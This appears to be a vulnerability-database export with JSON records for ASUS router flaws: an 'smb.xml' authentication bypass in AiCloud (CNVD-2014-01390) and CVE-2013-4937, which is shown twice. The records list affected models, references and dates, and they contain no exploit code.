            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS (ASUS) is the largest hardware manufacturer in Taiwan. A variety of ASUS router products (firmware version 3.0.0.4.374.x) failed to properly restrict access to the file /smb.xml after enabling the AiCloud web service, and an attacker could exploit the vulnerability to leak sensitive information. Multiple ASUS Routers are prone to an authentication-bypass vulnerability. \nAn attacker could leverage this issue to  bypass the authentication mechanism and obtain sensitive information. \nThe following products running firmware version 3.0.0.4.374.x are vulnerable:\nRT-AC68U Dual-band Wireless-AC1900 Gigabit Router\nRT-AC66R Dual-Band Wireless-AC1750 Gigabit Router\nRT-AC66U Dual-Band Wireless-AC1750 Gigabit Router\nRT-N66R Dual-Band Wireless-N900 Gigabit Router\nRT-N66U Dual-Band Wireless-N900 Gigabit Router\nRT-AC56U Dual-Band Wireless-AC1200 Gigabit Router\nRT-N56R Dual-Band Wireless-AC1200 Gigabit Router\nRT-N56U Dual-Band Wireless-AC1200 Gigabit Router\nRT-N14U Wireless-N300 Cloud Router\nRT-N14UHP Wireless-N300 Cloud Router\nRT-N16 Wireless-N300 Gigabit Router\nRT-N16R Wireless-N300 Gigabit Router",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          },
          {
            "db": "BID",
            "id": "65861"
          }
        ],
        "trust": 0.81
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "BID",
            "id": "65861",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "56905",
            "trust": 0.6
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          },
          {
            "db": "BID",
            "id": "65861"
          }
        ]
      },
      "id": "VAR-201403-0712",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          }
        ],
        "trust": 1.411373705909091
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          }
        ]
      },
      "last_update_date": "2022-05-17T01:51:10.409000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Patch for multiple ASUS routers \u0027smb.xml\u0027 authentication bypass vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/43991"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 0.6,
            "url": "http://secunia.com/advisories/56905/"
          },
          {
            "trust": 0.3,
            "url": "http://archives.neohapsis.com/archives/bugtraq/2014-02/0032.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.asus.com"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          },
          {
            "db": "BID",
            "id": "65861"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          },
          {
            "db": "BID",
            "id": "65861"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-03-03T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          },
          {
            "date": "2014-02-08T00:00:00",
            "db": "BID",
            "id": "65861"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-03-03T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          },
          {
            "date": "2014-02-08T00:00:00",
            "db": "BID",
            "id": "65861"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "network",
        "sources": [
          {
            "db": "BID",
            "id": "65861"
          }
        ],
        "trust": 0.3
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple ASUS Router \u0027smb.xml\u0027 Authentication Bypass Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Unknown",
        "sources": [
          {
            "db": "BID",
            "id": "65861"
          }
        ],
        "trust": 0.3
      }
    }

    CVE-2013-4937 (GCVE-0-2013-4937)

    Vulnerability from nvd – Published: 2013-07-26 10:00 – Updated: 2024-09-17 02:46
    VLAI
    Summary
    Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T16:59:40.986Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-07-26T10:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-4937",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://reviews.cnet.com/8301-3132_7-57594003-98",
                  "refsource": "MISC",
                  "url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
                },
                {
                  "name": "http://twitter.com/ASUSUSA/statuses/357612236392509440",
                  "refsource": "CONFIRM",
                  "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-4937",
        "datePublished": "2013-07-26T10:00:00.000Z",
        "dateReserved": "2013-07-26T00:00:00.000Z",
        "dateUpdated": "2024-09-17T02:46:42.662Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-4937 (GCVE-0-2013-4937)

    Vulnerability from cvelistv5 – Published: 2013-07-26 10:00 – Updated: 2024-09-17 02:46
    VLAI
    Summary
    Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T16:59:40.986Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-07-26T10:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-4937",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://reviews.cnet.com/8301-3132_7-57594003-98",
                  "refsource": "MISC",
                  "url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
                },
                {
                  "name": "http://twitter.com/ASUSUSA/statuses/357612236392509440",
                  "refsource": "CONFIRM",
                  "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-4937",
        "datePublished": "2013-07-26T10:00:00.000Z",
        "dateReserved": "2013-07-26T00:00:00.000Z",
        "dateUpdated": "2024-09-17T02:46:42.662Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }